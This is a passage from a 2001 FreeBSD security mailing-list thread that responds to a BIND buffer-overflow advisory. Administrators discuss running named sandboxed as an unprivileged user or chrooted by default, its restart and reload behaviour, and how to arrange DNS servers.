(sendmail-bs@127.0.0.1) by localhost with SMTP; 31 Jan 2001 22:48:13 -0000 Date: Wed, 31 Jan 2001 14:48:13 -0800 (PST) From: Brian Behlendorf X-X-Sender: To: Alfred Perlstein Cc: Roman Shterenzon , Subject: Re: FreeBSD Security Advisory: FreeBSD-SA-01:18.bind In-Reply-To: <20010131140447.E26076@fw.wintelcom.net> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, 31 Jan 2001, Alfred Perlstein wrote: > * Roman Shterenzon [010131 13:56] wrote: > > On Wed, 31 Jan 2001, FreeBSD Security Advisories wrote: > > > > > ============================================================================= > > > FreeBSD-SA-01:18 Security Advisory > > > > > > Topic: BIND remotely exploitable buffer overflow > > ..snip.. > > > > Why not make it default in the base system? > > It has been, but only for several days. I think he meant, why not set those recommendations for running as user "bind" and in a chroot jail as the default? Unless I'm missing something, that's not the case currently: [yez] 2:47pm ~ > fgrep -i named_flag /etc/defaults/rc.conf named_flags="" # Flags for named #named_flags="-u bind -g bind" # Flags for named Brian To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jan 31 14:54:50 2001 Delivered-To: freebsd-security@freebsd.org Received: from fw.wintelcom.net (ns1.wintelcom.net [209.1.153.20]) by hub.freebsd.org (Postfix) with ESMTP id E8A0E37B491 for ; Wed, 31 Jan 2001 14:54:29 -0800 (PST) Received: (from bright@localhost) by fw.wintelcom.net (8.10.0/8.10.0) id f0VMsNg21912; Wed, 31 Jan 2001 14:54:23 -0800 (PST) Date: Wed, 31 Jan 2001 14:54:23 -0800 From: Alfred Perlstein To: Brian Behlendorf Cc: Roman Shterenzon , freebsd-security@FreeBSD.ORG Subject: Re: FreeBSD Security Advisory: FreeBSD-SA-01:18.bind Message-ID: <20010131145423.H26076@fw.wintelcom.net> References: <20010131140447.E26076@fw.wintelcom.net> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: ; from brian@collab.net on Wed, Jan 31, 2001 at 02:48:13PM -0800 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org * Brian Behlendorf [010131 14:47] wrote: > On Wed, 31 Jan 2001, Alfred Perlstein wrote: > > * Roman Shterenzon [010131 13:56] wrote: > > > On Wed, 31 Jan 2001, FreeBSD Security Advisories wrote: > > > > > > > ============================================================================= > > > > FreeBSD-SA-01:18 Security Advisory > > > > > > > > Topic: BIND remotely exploitable buffer overflow > > > ..snip.. > > > > > > Why not make it default in the base system? > > > > It has been, but only for several days. > > I think he meant, why not set those recommendations for running as user > "bind" and in a chroot jail as the default? Unless I'm missing something, > that's not the case currently: > > [yez] 2:47pm ~ > fgrep -i named_flag /etc/defaults/rc.conf > named_flags="" # Flags for named > #named_flags="-u bind -g bind" # Flags for named Since named supports a command line option for chroot as well as user flags (-t) it would be trivial to have it the defaultt. It's pretty much a toss-up between usability and security. I guess this is the final blow for me, and I think we should run bind in a sandbox at this point, I'm just worried about confusing newbies who wish to set it up. If anyone has a proposal on doing it by default that doesn't impact ease of use (or if already doesn't impact it) then I'm for it. What I'm worrying about specifically is ndc and other utilities basically are unix domain sockets not in the expected place all of sudden? -- -Alfred Perlstein - [bright@wintelcom.net|alfred@freebsd.org] "I have the heart of a child; I keep it in a jar on my desk." To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jan 31 15: 6:24 2001 Delivered-To: freebsd-security@freebsd.org Received: from earth.backplane.com (earth-nat-cw.backplane.com [208.161.114.67]) by hub.freebsd.org (Postfix) with ESMTP id 7326F37B503 for ; Wed, 31 Jan 2001 15:06:03 -0800 (PST) Received: (from dillon@localhost) by earth.backplane.com (8.11.1/8.9.3) id f0VN5vJ19469; Wed, 31 Jan 2001 15:05:57 -0800 (PST) (envelope-from dillon) Date: Wed, 31 Jan 2001 15:05:57 -0800 (PST) From: Matt Dillon Message-Id: <200101312305.f0VN5vJ19469@earth.backplane.com> To: Alfred Perlstein Cc: Brian Behlendorf , Roman Shterenzon , freebsd-security@FreeBSD.ORG Subject: Re: FreeBSD Security Advisory: FreeBSD-SA-01:18.bind References: <20010131140447.E26076@fw.wintelcom.net> <20010131145423.H26076@fw.wintelcom.net> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org :> [yez] 2:47pm ~ > fgrep -i named_flag /etc/defaults/rc.conf :> named_flags="" # Flags for named :> #named_flags="-u bind -g bind" # Flags for named : :Since named supports a command line option for chroot as well :as user flags (-t) it would be trivial to have it the defaultt. : :It's pretty much a toss-up between usability and security. : :I guess this is the final blow for me, and I think we should :run bind in a sandbox at this point, I'm just worried about :confusing newbies who wish to set it up. : :If anyone has a proposal on doing it by default that doesn't :impact ease of use (or if already doesn't impact it) then I'm :for it. : :What I'm worrying about specifically is ndc and other utilities :basically are unix domain sockets not in the expected place all of :sudden? : :-- :-Alfred Perlstein - [bright@wintelcom.net|alfred@freebsd.org] :"I have the heart of a child; I keep it in a jar on my desk." Quite a few people have been using the sandbox options in the last year without any ill effects (I was the original author of the feature). The only issue is that you cannot HUP named (it will not be able to rebind its sockets), you can only restart it, and you have to supply the proper options to ndc when restarting it (-u bind -g bind). I usually restart it anyway (I don't trust the named HUP code). I think we can easily make it the default. By the way, I seem to recall someone posting some chown's/chmod's for /etc/namedb to run it in a sandbox that were wrong. *ALL* files in /etc/namedb except the 's/' subdirectory should be root.wheel, modes 644. The 's/' subdirectory should be user bind, group bind, modes 775. The only directory named needs to write to is /etc/namedb/s (for secondaries) and /var/run (for the pid file). - Using named's chrooting option is a more drastic approach, but also doable as a default IFF we compile named and named-xfer statically by default. Neither this mode of operation nor the jail mode has been widely tested. The sandbox options have been tested widely. -Matt To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jan 31 15:16: 4 2001 Delivered-To: freebsd-security@freebsd.org Received: from fw.wintelcom.net (ns1.wintelcom.net [209.1.153.20]) by hub.freebsd.org (Postfix) with ESMTP id 7303637B491 for ; Wed, 31 Jan 2001 15:15:42 -0800 (PST) Received: (from bright@localhost) by fw.wintelcom.net (8.10.0/8.10.0) id f0VNFWF22771; Wed, 31 Jan 2001 15:15:32 -0800 (PST) Date: Wed, 31 Jan 2001 15:15:31 -0800 From: Alfred Perlstein To: Matt Dillon Cc: Brian Behlendorf , Roman Shterenzon , freebsd-security@FreeBSD.ORG Subject: Re: FreeBSD Security Advisory: FreeBSD-SA-01:18.bind Message-ID: <20010131151531.I26076@fw.wintelcom.net> References: <20010131140447.E26076@fw.wintelcom.net> <20010131145423.H26076@fw.wintelcom.net> <200101312305.f0VN5vJ19469@earth.backplane.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <200101312305.f0VN5vJ19469@earth.backplane.com>; from dillon@earth.backplane.com on Wed, Jan 31, 2001 at 03:05:57PM -0800 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org * Matt Dillon [010131 15:06] wrote: > :> [yez] 2:47pm ~ > fgrep -i named_flag /etc/defaults/rc.conf > :> named_flags="" # Flags for named > :> #named_flags="-u bind -g bind" # Flags for named > : > :Since named supports a command line option for chroot as well > :as user flags (-t) it would be trivial to have it the defaultt. > : > :It's pretty much a toss-up between usability and security. > : > :I guess this is the final blow for me, and I think we should > :run bind in a sandbox at this point, I'm just worried about > :confusing newbies who wish to set it up. > : > :If anyone has a proposal on doing it by default that doesn't > :impact ease of use (or if already doesn't impact it) then I'm > :for it. > : > :What I'm worrying about specifically is ndc and other utilities > :basically are unix domain sockets not in the expected place all of > :sudden? > : > :-- > :-Alfred Perlstein - [bright@wintelcom.net|alfred@freebsd.org] > :"I have the heart of a child; I keep it in a jar on my desk." > > Quite a few people have been using the sandbox options in the > last year without any ill effects (I was the original author of > the feature). The only issue is that you cannot HUP named (it will > not be able to rebind its sockets), you can only restart it, and > you have to supply the proper options to ndc when restarting it > (-u bind -g bind). I usually restart it anyway (I don't trust the > named HUP code). > > I think we can easily make it the default. If it breaks HUP, then not really. :) I'm not sure how bind handles restarts, but even if it exec(2)s over itself it can track the fd open for its socket and shouldn't have to rebind it. > By the way, I seem to recall someone posting some chown's/chmod's > for /etc/namedb to run it in a sandbox that were wrong. *ALL* > files in /etc/namedb except the 's/' subdirectory should be root.wheel, > modes 644. The 's/' subdirectory should be user bind, group bind, > modes 775. The only directory named needs to write to is > /etc/namedb/s (for secondaries) and /var/run (for the pid file). Makes sense, it almost makes sense to make /var/run/named.pid a symlink into /etc/named/named.pid. > Using named's chrooting option is a more drastic approach, but also > doable as a default IFF we compile named and named-xfer statically > by default. Neither this mode of operation nor the jail mode has > been widely tested. The sandbox options have been tested widely. A shell script could copy the required shared libs into the chroot tree. -- -Alfred Perlstein - [bright@wintelcom.net|alfred@freebsd.org] "I have the heart of a child; I keep it in a jar on my desk." To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jan 31 15:24:47 2001 Delivered-To: freebsd-security@freebsd.org Received: from cx175057-a.ocnsd1.sdca.home.com (cx175057-a.ocnsd1.sdca.home.com [24.13.23.40]) by hub.freebsd.org (Postfix) with ESMTP id F3A0B37B4EC for ; Wed, 31 Jan 2001 15:24:25 -0800 (PST) Received: from localhost (bri@localhost) by cx175057-a.ocnsd1.sdca.home.com (8.11.1/8.11.1) with ESMTP id f0VNPIj39710; Wed, 31 Jan 2001 15:25:18 -0800 (PST) (envelope-from bri@sonicboom.org) Date: Wed, 31 Jan 2001 15:25:18 -0800 (PST) From: Brian X-Sender: bri@cx175057-a.ocnsd1.sdca.home.com To: Alfred Perlstein Cc: Roman Shterenzon , freebsd-security@FreeBSD.ORG Subject: Re: FreeBSD Security Advisory: FreeBSD-SA-01:18.bind In-Reply-To: <20010131140447.E26076@fw.wintelcom.net> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I downloaded ports this am, and it was not the default at that point, on cvsup10. Bri On Wed, 31 Jan 2001, Alfred Perlstein wrote: > * Roman Shterenzon [010131 13:56] wrote: > > On Wed, 31 Jan 2001, FreeBSD Security Advisories wrote: > > > > > ============================================================================= > > > FreeBSD-SA-01:18 Security Advisory > > > > > > Topic: BIND remotely exploitable buffer overflow > > ..snip.. > > > > Why not make it default in the base system? > > It has been, but only for several days. > > -- > -Alfred Perlstein - [bright@wintelcom.net|alfred@freebsd.org] > "I have the heart of a child; I keep it in a jar on my desk." > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jan 31 15:26: 3 2001 Delivered-To: freebsd-security@freebsd.org Received: from whistle.com (s205m131.whistle.com [207.76.205.131]) by hub.freebsd.org (Postfix) with ESMTP id 1961137B503 for ; Wed, 31 Jan 2001 15:25:42 -0800 (PST) Received: (from smap@localhost) by whistle.com (8.10.0/8.10.0) id f0VNPf206375 for ; Wed, 31 Jan 2001 15:25:41 -0800 (PST) Received: from pau-amma.whistle.com( 207.76.205.64) by whistle.com via smap (V2.0) id xma006372; Wed, 31 Jan 2001 15:25:20 -0800 Received: (from dhw@localhost) by pau-amma.whistle.com (8.11.1/8.11.1) id f0VNPKS00324 for freebsd-security@freebsd.org; Wed, 31 Jan 2001 15:25:20 -0800 (PST) Date: Wed, 31 Jan 2001 15:25:20 -0800 (PST) From: David Wolfskill Message-Id: <200101312325.f0VNPKS00324@pau-amma.whistle.com> To: freebsd-security@freebsd.org Subject: Re: FreeBSD Security Advisory: FreeBSD-SA-01:18.bind In-Reply-To: <20010131151531.I26076@fw.wintelcom.net> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Date: Wed, 31 Jan 2001 15:15:31 -0800 >From: Alfred Perlstein >> Quite a few people have been using the sandbox options in the >> last year without any ill effects (I was the original author of >> the feature). The only issue is that you cannot HUP named (it will >> not be able to rebind its sockets), you can only restart it, and >> you have to supply the proper options to ndc when restarting it >> (-u bind -g bind). I usually restart it anyway (I don't trust the >> named HUP code). >> I think we can easily make it the default. >If it breaks HUP, then not really. :) janus# ps -axwwl|grep named 53 21965 1 0 2 0 2352 1176 select Is ?? 0:09.82 /usr/sbin/named -u bind -g bind 0 25313 289 2 -6 0 944 472 piperd S+ p0 0:00.01 grep named janus# ndc reload Reload initiated. janus# uname -a FreeBSD janus.catwhisker.org 3.2-RELEASE FreeBSD 3.2-RELEASE #0: Wed Jan 24 07:08:56 PST 2001 root@bunrab.catwhisker.org:/usr/src/sys/compile/JANUS i386 janus# (Note that uid "53" is that of "bind", not "root".) Meanwhile, in /var/log/messages: Jan 31 15:19:52 janus named[21965]: reloading nameserver Jan 31 15:19:52 janus named[21965]: Ready to answer queries. The other thing I did: janus# ls -ld /var/run drwxrwxrwt 2 root wheel 512 Jan 31 15:19 /var/run janus# !!/named* ls -ld /var/run/named* -rw-r--r-- 1 bind bind 6 Jan 31 15:19 /var/run/named.pid janus# (The machine does not have "general logins" at all.) >I'm not sure how bind handles restarts, but even if it exec(2)s over >itself it can track the fd open for its socket and shouldn't have to >rebind it. Seems to work for me. Note I'm not trying to use the chroot() environment, nor a jail; just a little sandbox. (Oh, yeah: I set up /var/named as the durectory for BIND to play with, because I have / & /sur mounted read-only.) Cheers, david -- David Wolfskill dhw@whistle.com UNIX System Administrator Desk: 650/577-7158 TIE: 8/499-7158 Cell: 650/759-0823 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jan 31 15:26:39 2001 Delivered-To: freebsd-security@freebsd.org Received: from silby.com (cb34181-c.mdsn1.wi.home.com [24.183.3.139]) by hub.freebsd.org (Postfix) with ESMTP id ED2D837B65D for ; Wed, 31 Jan 2001 15:26:21 -0800 (PST) Received: (qmail 769 invoked by uid 1000); 31 Jan 2001 23:26:19 -0000 Received: from localhost (sendmail-bs@127.0.0.1) by localhost with SMTP; 31 Jan 2001 23:26:19 -0000 Date: Wed, 31 Jan 2001 17:26:19 -0600 (CST) From: Mike Silbersack To: Alfred Perlstein Cc: Matt Dillon , Brian Behlendorf , Roman Shterenzon , Subject: Re: FreeBSD Security Advisory: FreeBSD-SA-01:18.bind In-Reply-To: <20010131151531.I26076@fw.wintelcom.net> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, 31 Jan 2001, Alfred Perlstein wrote: > If it breaks HUP, then not really. :) > > I'm not sure how bind handles restarts, but even if it exec(2)s over > itself it can track the fd open for its socket and shouldn't have to > rebind it. I don't see any complaints from 8.2.3 running -u bind -g bind when I HUP it here. (Well, ok, I see the can't create pidfile junk, but that's not critical IMHO.) Mike "Silby" Silbersack To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jan 31 15:27:47 2001 Delivered-To: freebsd-security@freebsd.org Received: from earth.backplane.com (earth-nat-cw.backplane.com [208.161.114.67]) by hub.freebsd.org (Postfix) with ESMTP id CDCB237B491 for ; Wed, 31 Jan 2001 15:27:30 -0800 (PST) Received: (from dillon@localhost) by earth.backplane.com (8.11.1/8.9.3) id f0VNRPv20077; Wed, 31 Jan 2001 15:27:25 -0800 (PST) (envelope-from dillon) Date: Wed, 31 Jan 2001 15:27:25 -0800 (PST) From: Matt Dillon Message-Id: <200101312327.f0VNRPv20077@earth.backplane.com> To: Alfred Perlstein Cc: Brian Behlendorf , Roman Shterenzon , freebsd-security@FreeBSD.ORG Subject: Re: FreeBSD Security Advisory: FreeBSD-SA-01:18.bind References: <20010131140447.E26076@fw.wintelcom.net> <20010131145423.H26076@fw.wintelcom.net> <200101312305.f0VN5vJ19469@earth.backplane.com> <20010131151531.I26076@fw.wintelcom.net> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org :> I think we can easily make it the default. : :If it breaks HUP, then not really. :) : :I'm not sure how bind handles restarts, but even if it exec(2)s over :itself it can track the fd open for its socket and shouldn't have to :rebind it. You gotta work with what you have. Bind outsmarts itself in a lot of places, especially the stupid interface scanning/binding code. The last thing I want it to do is hold *any* state from the previous incarnation across a restart. Frankly, restarting is not a big deal even if you have hundreds or thousands of domains. I always restarted named at BEST rather then HUP it, becausing HUPing is simply too dangerous when you make random modifications to dozens of primary zone files out of thousands. ndc kill's the original bind and starts a new one as root when you use 'ndc restart'. -Matt To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jan 31 15:36:29 2001 Delivered-To: freebsd-security@freebsd.org Received: from whistle.com (s205m131.whistle.com [207.76.205.131]) by hub.freebsd.org (Postfix) with ESMTP id AC05D37B4EC for ; Wed, 31 Jan 2001 15:36:12 -0800 (PST) Received: (from smap@localhost) by whistle.com (8.10.0/8.10.0) id f0VNaCw06510 for ; Wed, 31 Jan 2001 15:36:12 -0800 (PST) Received: from pau-amma.whistle.com( 207.76.205.64) by whistle.com via smap (V2.0) id xma006507; Wed, 31 Jan 2001 15:35:54 -0800 Received: (from dhw@localhost) by pau-amma.whistle.com (8.11.1/8.11.1) id f0VNZrk00415 for freebsd-security@FreeBSD.ORG; Wed, 31 Jan 2001 15:35:53 -0800 (PST) Date: Wed, 31 Jan 2001 15:35:53 -0800 (PST) From: David Wolfskill Message-Id: <200101312335.f0VNZrk00415@pau-amma.whistle.com> To: freebsd-security@FreeBSD.ORG Subject: Re: FreeBSD Security Advisory: FreeBSD-SA-01:18.bind In-Reply-To: <200101312327.f0VNRPv20077@earth.backplane.com> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Date: Wed, 31 Jan 2001 15:27:25 -0800 (PST) >From: Matt Dillon > ndc kill's the original bind and starts a new one as root when you use > 'ndc restart'. So don't do that -- quite. Use "ndc restart -u bind -g bind" instead. (Granted, that's more keystrokes to remember & get wrong.... Maybe if named.pid were structed like sendmail.pid, that would provide a way to automate the process a little better.) Cheers, david -- David Wolfskill dhw@whistle.com UNIX System Administrator Desk: 650/577-7158 TIE: 8/499-7158 Cell: 650/759-0823 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jan 31 15:39: 5 2001 Delivered-To: freebsd-security@freebsd.org Received: from jamus.xpert.com (jamus.xpert.com [199.203.132.17]) by hub.freebsd.org (Postfix) with ESMTP id EC12537B491 for ; Wed, 31 Jan 2001 15:38:45 -0800 (PST) Received: from roman (helo=localhost) by jamus.xpert.com with local-esmtp (Exim 3.12 #5) id 14O6pE-0002Po-00 for freebsd-security@freebsd.org; Thu, 01 Feb 2001 01:38:08 +0200 Date: Thu, 1 Feb 2001 01:38:08 +0200 (IST) From: Roman Shterenzon To: Subject: Re: FreeBSD Security Advisory: FreeBSD-SA-01:18.bind In-Reply-To: <20010131145423.H26076@fw.wintelcom.net> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, 31 Jan 2001, Alfred Perlstein wrote: > * Brian Behlendorf [010131 14:47] wrote: > > On Wed, 31 Jan 2001, Alfred Perlstein wrote: > > > * Roman Shterenzon [010131 13:56] wrote: > > > > On Wed, 31 Jan 2001, FreeBSD Security Advisories wrote: > > > > > > > > > ============================================================================= > > > > > FreeBSD-SA-01:18 Security Advisory > > > > > > > > > > Topic: BIND remotely exploitable buffer overflow > > > > ..snip.. > > > > > > > > Why not make it default in the base system? > > > > > > It has been, but only for several days. > > > > I think he meant, why not set those recommendations for running as user > > "bind" and in a chroot jail as the default? Unless I'm missing something, > > that's not the case currently: > > > > [yez] 2:47pm ~ > fgrep -i named_flag /etc/defaults/rc.conf > > named_flags="" # Flags for named > > #named_flags="-u bind -g bind" # Flags for named > > Since named supports a command line option for chroot as well > as user flags (-t) it would be trivial to have it the defaultt. > > It's pretty much a toss-up between usability and security. It's more secure than "unusable" :) > I guess this is the final blow for me, and I think we should > run bind in a sandbox at this point, I'm just worried about > confusing newbies who wish to set it up. That was my point. > If anyone has a proposal on doing it by default that doesn't > impact ease of use (or if already doesn't impact it) then I'm > for it. Change /etc/defaults/rc.conf and tweak named installation to chown /var/named; add user named and group named to shipping /etc/passwd and /etc/group > What I'm worrying about specifically is ndc and other utilities > basically are unix domain sockets not in the expected place all of > sudden? Hmm.. interesting point. I guess they are created in /var/named which is accessible from the outer world. --Roman Shterenzon, UNIX System Administrator and Consultant [ Xpert UNIX Systems Ltd., Herzlia, Israel. Tel: +972-9-9522361 ] To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jan 31 15:42:54 2001 Delivered-To: freebsd-security@freebsd.org Received: from earth.backplane.com (earth-nat-cw.backplane.com [208.161.114.67]) by hub.freebsd.org (Postfix) with ESMTP id 490DE37B67D for ; Wed, 31 Jan 2001 15:42:37 -0800 (PST) Received: (from dillon@localhost) by earth.backplane.com (8.11.1/8.9.3) id f0VNgUm20557; Wed, 31 Jan 2001 15:42:30 -0800 (PST) (envelope-from dillon) Date: Wed, 31 Jan 2001 15:42:30 -0800 (PST) From: Matt Dillon Message-Id: <200101312342.f0VNgUm20557@earth.backplane.com> To: Mike Silbersack Cc: Alfred Perlstein , Brian Behlendorf , Roman Shterenzon , Subject: Re: FreeBSD Security Advisory: FreeBSD-SA-01:18.bind References: Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org :I don't see any complaints from 8.2.3 running -u bind -g bind when I HUP :it here. : :(Well, ok, I see the can't create pidfile junk, but that's not critical :IMHO.) : :Mike "Silby" Silbersack Hmm. maybe Paul fixed it the close/reopen of the sockets. Or I could be full of it... ah, wait, I remember. The interface rescanning is broken when you run in a sandbox (it can't bind to new sockets from the sandbox). If your interfaces don't change out from under you, you should be ok. -Matt To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jan 31 15:54: 1 2001 Delivered-To: freebsd-security@freebsd.org Received: from verdi.nethelp.no (verdi.nethelp.no [158.36.41.162]) by hub.freebsd.org (Postfix) with SMTP id E62CB37B699 for ; Wed, 31 Jan 2001 15:53:27 -0800 (PST) Received: (qmail 28880 invoked by uid 1001); 31 Jan 2001 23:53:25 +0000 (GMT) To: dillon@earth.backplane.com Cc: freebsd-security@FreeBSD.ORG Subject: Re: FreeBSD Security Advisory: FreeBSD-SA-01:18.bind From: sthaug@nethelp.no In-Reply-To: Your message of "Wed, 31 Jan 2001 15:27:25 -0800 (PST)" References: <200101312327.f0VNRPv20077@earth.backplane.com> X-Mailer: Mew version 1.05+ on Emacs 19.34.2 Mime-Version: 1.0 Content-Type: Text/Plain; charset=us-ascii Date: Thu, 01 Feb 2001 00:53:25 +0100 Message-ID: <28878.980985205@verdi.nethelp.no> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > You gotta work with what you have. Bind outsmarts itself in a lot > of places, especially the stupid interface scanning/binding > code. Agreed. > The > last thing I want it to do is hold *any* state from the previous > incarnation across a restart. Frankly, restarting is not a big deal > even if you have hundreds or thousands of domains. I always restarted > named at BEST rather then HUP it, becausing HUPing is simply too > dangerous when you make random modifications to dozens of primary > zone files out of thousands. Disagree. The problem here is that named stops answering queries for a long time while it is sucking in the zone files. This is mostly a problem for servers with many thousands of domains - but in those cases it can be quite noticeable. Here's a server with 14000 zones: Jan 28 22:22:31 nn named[8645]: starting (/etc/named.conf). named 8.2.3-REL ... Jan 28 22:33:26 nn named[8740]: Ready to answer queries. Steinar Haug, Nethelp consulting, sthaug@nethelp.no To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jan 31 16:50: 7 2001 Delivered-To: freebsd-security@freebsd.org Received: from yeti.ismedia.pl (yeti.ismedia.pl [212.182.96.18]) by hub.freebsd.org (Postfix) with SMTP id 024AD37B67D for ; Wed, 31 Jan 2001 16:49:45 -0800 (PST) Received: (qmail 79468 invoked from network); 1 Feb 2001 00:51:24 -0000 Received: from unknown (HELO lagoon.freebsd.lublin.pl) (212.182.115.11) by 0 with SMTP; 1 Feb 2001 00:51:24 -0000 Received: (qmail 36040 invoked from network); 1 Feb 2001 00:48:19 -0000 Received: from unknown (HELO riget.scene.pl) () by 0 with SMTP; 1 Feb 2001 00:48:19 -0000 Received: (qmail 36037 invoked by uid 1001); 1 Feb 2001 00:48:19 -0000 Date: Thu, 1 Feb 2001 01:48:19 +0100 From: Przemyslaw Frasunek To: freebsd-security@freebsd.org Subject: Re: FreeBSD Security Advisory: FreeBSD-SA-01:18.bind Message-ID: <20010201014819.H675@riget.scene.pl> References: <200101312123.f0VLNL134920@freefall.freebsd.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: ; from roman@xpert.com on Wed, Jan 31, 2001 at 11:55:18PM +0200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, Jan 31, 2001 at 11:55:18PM +0200, Roman Shterenzon wrote: > Why not make it default in the base system? The best workaround is not using BIND at all. Consider some alternatives, like /usr/ports/net/djbdns. -- * Fido: 2:480/124 ** WWW: http://www.frasunek.com/ ** NIC-HDL: PMF9-RIPE * * Inet: przemyslaw@frasunek.com ** PGP: D48684904685DF43EA93AFA13BE170BF * To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jan 31 17: 2: 6 2001 Delivered-To: freebsd-security@freebsd.org Received: from shemp.palomine.net (shemp.palomine.net [205.198.88.200]) by hub.freebsd.org (Postfix) with SMTP id 7A5DD37B69D for ; Wed, 31 Jan 2001 17:01:45 -0800 (PST) Received: (qmail 90301 invoked by uid 1000); 1 Feb 2001 01:01:42 -0000 Date: Wed, 31 Jan 2001 20:01:42 -0500 From: Chris Johnson To: Przemyslaw Frasunek Cc: freebsd-security@freebsd.org Subject: Re: FreeBSD Security Advisory: FreeBSD-SA-01:18.bind Message-ID: <20010131200142.A90211@palomine.net> References: <200101312123.f0VLNL134920@freefall.freebsd.org> <20010201014819.H675@riget.scene.pl> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <20010201014819.H675@riget.scene.pl>; from venglin@freebsd.lublin.pl on Thu, Feb 01, 2001 at 01:48:19AM +0100 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Thu, Feb 01, 2001 at 01:48:19AM +0100, Przemyslaw Frasunek wrote: > On Wed, Jan 31, 2001 at 11:55:18PM +0200, Roman Shterenzon wrote: > > Why not make it default in the base system? > > The best workaround is not using BIND at all. Consider some alternatives, > like /usr/ports/net/djbdns. Yes! Why work around BIND limitiations and do all this sandboxing to try to limit the damage it can do to you, when there's a better alternative? Chris To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jan 31 17:51:35 2001 Delivered-To: freebsd-security@freebsd.org Received: from earth.backplane.com (earth-nat-cw.backplane.com [208.161.114.67]) by hub.freebsd.org (Postfix) with ESMTP id 2CB9C37B69E for ; Wed, 31 Jan 2001 17:51:15 -0800 (PST) Received: (from dillon@localhost) by earth.backplane.com (8.11.1/8.9.3) id f111omZ23184; Wed, 31 Jan 2001 17:50:48 -0800 (PST) (envelope-from dillon) Date: Wed, 31 Jan 2001 17:50:48 -0800 (PST) From: Matt Dillon Message-Id: <200102010150.f111omZ23184@earth.backplane.com> To: sthaug@nethelp.no Cc: freebsd-security@FreeBSD.ORG Subject: Re: FreeBSD Security Advisory: FreeBSD-SA-01:18.bind References: <200101312327.f0VNRPv20077@earth.backplane.com> <28878.980985205@verdi.nethelp.no> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org : :Disagree. The problem here is that named stops answering queries for a :long time while it is sucking in the zone files. This is mostly a problem :for servers with many thousands of domains - but in those cases it can be :quite noticeable. Here's a server with 14000 zones: : :Jan 28 22:22:31 nn named[8645]: starting (/etc/named.conf). named 8.2.3-REL Umm... respectfully, you are not configuring your system correctly if the down time affects you. This is what we did at BEST: * Three machines running named , recursive enabled, not serving any primary zones. All machines and customers accessed these three DNS servers to do lookups. We generally did not restart these, and when we did the restarts were instantanious (since they weren't primary for any zones). * Three machines running named, non-recursive, ONLY used to serve primary and secondary zones. At least 20,000 zones, dup'd to each box. We updated the primary DNS boxes four times a day. We updated the boxes one at a time, so at any given moment only one was 'down'. The DNS protocols handle the rest. It's perfectly acceptable for a primary NS to be down as long as other primary NS's are up. -Matt To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jan 31 17:54:53 2001 Delivered-To: freebsd-security@freebsd.org Received: from 